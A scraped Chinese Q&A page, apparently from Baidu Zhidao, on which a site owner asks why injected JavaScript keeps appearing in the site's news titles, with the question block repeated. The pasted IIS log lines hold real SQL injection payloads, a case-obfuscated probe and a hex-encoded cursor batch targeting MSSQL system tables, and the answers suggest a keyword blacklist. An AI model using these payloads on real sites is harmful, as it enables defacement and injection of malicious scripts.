UC知道关于SQL 注入
来源:百度知道 编辑:UC知道 时间:2024/05/16 23:44:13
最新网站总被注入~就是所有的新闻标题都被插进入JS代码了,
然后我已经使用了通用防注入的,还写了只允许数字的代码,但是貌视没啥效果哦~
IIS记录如下:
2009-01-18 20:51:18 W3SVC1 125.32.112.60 GET /gqshow.asp id=382%25'%20AnD%20(sElEcT%20ChAr(94)%2BcAsT(CoUnT(1)%20aS%20VaRcHaR(100))%2bChAr(94)%20fRoM%20[mAsTeR]..[sYsDaTaBaSeS])>0%20And%20'%25'=' 80 - 122.42.68.87 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.0) 200 0 0
2009-01-18 20:51:18 W3SVC1 125.32.112.60 GET /gqshow.asp?id=382;dEcLaRe%20@S%20VaRcHaR(4000)%20SeT%20@s=cAsT(0x4445434C415245204054205641524348415228323535292C404320564152434841522832353529204445434C415245205461626C655F437572736F7220435552534F5220464F522053454C45435420612E6E616D652C622E6E616D652046524F4D207379736F626A6563747320612C737973636F6C756D6E73206220574845524520612E69643D622E696420414E4420612E78747970653D27752720414E442028622E78747970653D3939204F5220622E78747970653D3335204F5220622E78747970653D323331204F5220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558
然后我已经使用了通用防注入的,还写了只允许数字的代码,但是貌视没啥效果哦~
IIS记录如下:
2009-01-18 20:51:18 W3SVC1 125.32.112.60 GET /gqshow.asp id=382%25'%20AnD%20(sElEcT%20ChAr(94)%2BcAsT(CoUnT(1)%20aS%20VaRcHaR(100))%2bChAr(94)%20fRoM%20[mAsTeR]..[sYsDaTaBaSeS])>0%20And%20'%25'=' 80 - 122.42.68.87 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.0) 200 0 0
2009-01-18 20:51:18 W3SVC1 125.32.112.60 GET /gqshow.asp?id=382;dEcLaRe%20@S%20VaRcHaR(4000)%20SeT%20@s=cAsT(0x4445434C415245204054205641524348415228323535292C404320564152434841522832353529204445434C415245205461626C655F437572736F7220435552534F5220464F522053454C45435420612E6E616D652C622E6E616D652046524F4D207379736F626A6563747320612C737973636F6C756D6E73206220574845524520612E69643D622E696420414E4420612E78747970653D27752720414E442028622E78747970653D3939204F5220622E78747970653D3335204F5220622E78747970653D323331204F5220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558
额 我还以为是问怎么注入的 原来是安全卫士啊 晕 给我留条言抽空我给你一条代码 可以防止MD5的爆破
看来人家用了大小写转换了,还有字符编码了.
你可以先吧通用注入的 遍历前的条件全部转换成小写在 匹配
declare select 之类的